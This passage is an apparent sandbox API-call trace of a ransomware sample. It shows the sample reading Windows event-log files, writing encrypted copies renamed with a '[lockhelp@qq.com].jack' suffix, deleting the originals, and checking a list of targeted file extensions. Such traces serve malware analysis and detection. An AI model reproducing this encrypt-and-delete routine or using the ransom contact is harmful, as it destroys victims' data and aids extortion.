returned 0x3e4 [0207.239] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0207.239] CloseHandle (hObject=0x3e4) returned 1 [0207.239] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx")) returned 0x20 [0207.239] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.239] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.239] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.239] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.239] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0207.240] GetLastError () returned 0x0 [0207.240] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.432] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.434] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.434] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x136, lpOverlapped=0x0) returned 1 [0207.434] SetEndOfFile (hFile=0x404) returned 1 [0207.434] CloseHandle (hObject=0x404) returned 1 [0207.437] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.437] SetEndOfFile (hFile=0x3e4) returned 1 [0207.438] CloseHandle (hObject=0x3e4) returned 1 [0207.438] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.439] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx")) returned 1 [0207.439] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.439] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.439] lstrlenW (lpString=".doc") returned 4 [0207.439] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.439] lstrlenW (lpString=".docx") returned 5 [0207.439] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.439] lstrlenW (lpString=".pdf") returned 4 [0207.439] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.452] lstrlenW (lpString=".xls") returned 4 [0207.452] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.452] lstrlenW (lpString=".xlsx") returned 5 [0207.452] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.452] lstrlenW (lpString=".ppt") returned 4 [0207.452] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.452] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.452] lstrlenW (lpString=".zip") returned 4 [0207.452] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.452] lstrlenW (lpString=".rar") returned 4 [0207.452] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.453] lstrlenW (lpString=".bz2") returned 4 [0207.453] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.462] lstrlenW (lpString=".7z") returned 3 [0207.462] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.462] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.462] lstrlenW (lpString=".dbf") returned 4 [0207.462] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.462] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.462] lstrlenW (lpString=".1cd") returned 4 [0207.462] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.463] lstrlenW (lpString=".jpg") returned 4 [0207.463] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.463] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.463] lstrlenW (lpString=".doc") returned 4 [0207.463] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString=".docx") returned 5 [0207.463] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.463] lstrlenW (lpString=".pdf") returned 4 [0207.463] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString=".xls") returned 4 [0207.463] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString=".xlsx") returned 5 [0207.463] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.463] lstrlenW (lpString=".ppt") returned 4 [0207.463] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.463] lstrlenW (lpString=".zip") returned 4 [0207.463] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString=".rar") returned 4 [0207.463] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString=".bz2") returned 4 [0207.463] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString=".7z") returned 3 [0207.463] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.463] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.463] lstrlenW (lpString=".dbf") returned 4 [0207.463] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.463] lstrlenW (lpString=".1cd") returned 4 [0207.463] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.463] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0207.464] lstrlenW (lpString=".jpg") returned 4 [0207.464] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.464] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.464] lstrlenW (lpString="Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 54 [0207.464] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.464] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0207.464] CloseHandle (hObject=0x3e4) returned 1 [0207.464] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx")) returned 0x20 [0207.464] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.464] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.464] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.465] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.465] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0207.465] GetLastError () returned 0x0 [0207.465] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.467] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.468] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.468] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x140, lpOverlapped=0x0) returned 1 [0207.469] SetEndOfFile (hFile=0x404) returned 1 [0207.469] CloseHandle (hObject=0x404) returned 1 [0207.473] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.473] SetEndOfFile (hFile=0x3e4) returned 1 [0207.474] CloseHandle (hObject=0x3e4) returned 1 [0207.474] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.474] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx")) returned 1 [0207.475] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.475] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.475] lstrlenW (lpString=".doc") returned 4 [0207.475] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.475] lstrlenW (lpString=".docx") returned 5 [0207.475] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.475] lstrlenW (lpString=".pdf") returned 4 [0207.475] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.475] lstrlenW (lpString=".xls") returned 4 [0207.475] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.475] lstrlenW (lpString=".xlsx") returned 5 [0207.475] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.475] lstrlenW (lpString=".ppt") returned 4 [0207.475] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.475] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.475] lstrlenW (lpString=".zip") returned 4 [0207.475] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.475] lstrlenW (lpString=".rar") returned 4 [0207.475] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.475] lstrlenW (lpString=".bz2") returned 4 [0207.475] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.475] lstrlenW (lpString=".7z") returned 3 [0207.475] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.475] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.475] lstrlenW (lpString=".dbf") returned 4 [0207.475] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.475] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.475] lstrlenW (lpString=".1cd") returned 4 [0207.475] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.475] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.475] lstrlenW (lpString=".jpg") returned 4 [0207.476] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.476] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.476] lstrlenW (lpString=".doc") returned 4 [0207.476] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString=".docx") returned 5 [0207.476] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.476] lstrlenW (lpString=".pdf") returned 4 [0207.476] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString=".xls") returned 4 [0207.476] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString=".xlsx") returned 5 [0207.476] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.476] lstrlenW (lpString=".ppt") returned 4 [0207.476] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.476] lstrlenW (lpString=".zip") returned 4 [0207.476] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString=".rar") returned 4 [0207.476] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString=".bz2") returned 4 [0207.476] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString=".7z") returned 3 [0207.476] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.476] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.476] lstrlenW (lpString=".dbf") returned 4 [0207.476] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.476] lstrlenW (lpString=".1cd") returned 4 [0207.476] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.476] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0207.476] lstrlenW (lpString=".jpg") returned 4 [0207.476] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.477] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.477] lstrlenW (lpString="Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 41 [0207.477] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.477] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0207.477] CloseHandle (hObject=0x3e4) returned 1 [0207.477] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx")) returned 0x20 [0207.477] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.478] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.478] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.478] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.478] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0207.478] GetLastError () returned 0x0 [0207.478] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.480] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.482] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.482] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x126, lpOverlapped=0x0) returned 1 [0207.482] SetEndOfFile (hFile=0x404) returned 1 [0207.482] CloseHandle (hObject=0x404) returned 1 [0207.485] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.485] SetEndOfFile (hFile=0x3e4) returned 1 [0207.486] CloseHandle (hObject=0x3e4) returned 1 [0207.486] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.487] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx")) returned 1 [0207.487] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.487] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.487] lstrlenW (lpString=".doc") returned 4 [0207.487] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.487] lstrlenW (lpString=".docx") returned 5 [0207.487] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.488] lstrlenW (lpString=".pdf") returned 4 [0207.488] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.488] lstrlenW (lpString=".xls") returned 4 [0207.488] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.488] lstrlenW (lpString=".xlsx") returned 5 [0207.488] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.488] lstrlenW (lpString=".ppt") returned 4 [0207.488] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.488] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.488] lstrlenW (lpString=".zip") returned 4 [0207.488] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.488] lstrlenW (lpString=".rar") returned 4 [0207.488] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.488] lstrlenW (lpString=".bz2") returned 4 [0207.488] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.488] lstrlenW (lpString=".7z") returned 3 [0207.488] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.488] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.488] lstrlenW (lpString=".dbf") returned 4 [0207.488] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.488] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.488] lstrlenW (lpString=".1cd") returned 4 [0207.488] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.488] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.488] lstrlenW (lpString=".jpg") returned 4 [0207.488] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.488] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.488] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.489] lstrlenW (lpString=".doc") returned 4 [0207.489] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.489] lstrlenW (lpString=".docx") returned 5 [0207.489] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.489] lstrlenW (lpString=".pdf") returned 4 [0207.489] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.489] lstrlenW (lpString=".xls") returned 4 [0207.489] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.489] lstrlenW (lpString=".xlsx") returned 5 [0207.489] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.489] lstrlenW (lpString=".ppt") returned 4 [0207.489] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.489] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.489] lstrlenW (lpString=".zip") returned 4 [0207.489] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.489] lstrlenW (lpString=".rar") returned 4 [0207.489] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.489] lstrlenW (lpString=".bz2") returned 4 [0207.489] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.489] lstrlenW (lpString=".7z") returned 3 [0207.489] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.489] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.489] lstrlenW (lpString=".dbf") returned 4 [0207.489] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.489] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.489] lstrlenW (lpString=".1cd") returned 4 [0207.489] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.489] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0207.489] lstrlenW (lpString=".jpg") returned 4 [0207.489] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.490] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.490] lstrlenW (lpString="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 43 [0207.490] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.490] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0207.490] CloseHandle (hObject=0x3e4) returned 1 [0207.490] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx")) returned 0x20 [0207.490] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.490] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.490] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.491] SetFilePointerEx (in: hFile=0x3e4, 